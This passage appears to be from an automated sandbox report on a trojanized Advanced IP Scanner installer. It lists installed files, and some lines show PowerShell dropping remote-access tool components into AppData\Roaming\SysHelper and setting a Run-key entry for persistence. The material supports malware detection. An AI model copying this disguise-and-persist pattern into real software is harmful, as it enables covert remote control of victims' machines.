                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\printsupport\windowsprintersupport.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-8ANUI.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-4D790.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-JMQQ6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\pcre.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-NMSBJ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\ucrtbase.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-G1QBE.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\client32.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-E5GMR.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-50T4N.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-IMIK4.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-SNR73.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\platforms\is-R93D4.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-LK5P7.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-JD615.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-OFA57.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-G1AVJ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\ssleay32.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-HU2BS.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-MLS3P.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-GSEGB.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-8NFDN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-51B0J.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-IG6SE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-BI69I.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-HE8PV.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-JV2VP.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\vcruntime140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-MRJ39.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-6GDPR.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-GO656.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-94LO6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-FDUCH.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\msvcp140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-CFBB0.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-S9HF4.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-KVJOO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-8I66A.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-B6942.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-7T7KO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exeFile created: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-GUGRV.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-2CC7N.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\printsupport\is-RSL5S.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\remcmdstub.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-9QSUE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-4PSUK.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-3DFK3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\unins000.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-PV5DC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-NDG98.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-37BEP.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\msvcr100.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-OL4PO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-UUUMK.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-7UOKJ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-3ARML.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\libeay32.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-J88P9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-QNSIE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-JMNJE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-FM5PR.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-QK8GI.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\platforms\qwindows.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-T33P0.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-NAJMA.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-VU48S.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-UNM54.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-4DCVH.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-087J4.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_685A7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,7_2_685A7030
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network ToolsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network Tools\Advanced IP Scanner for Windows.lnkJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyAppJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyAppJump to behavior

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
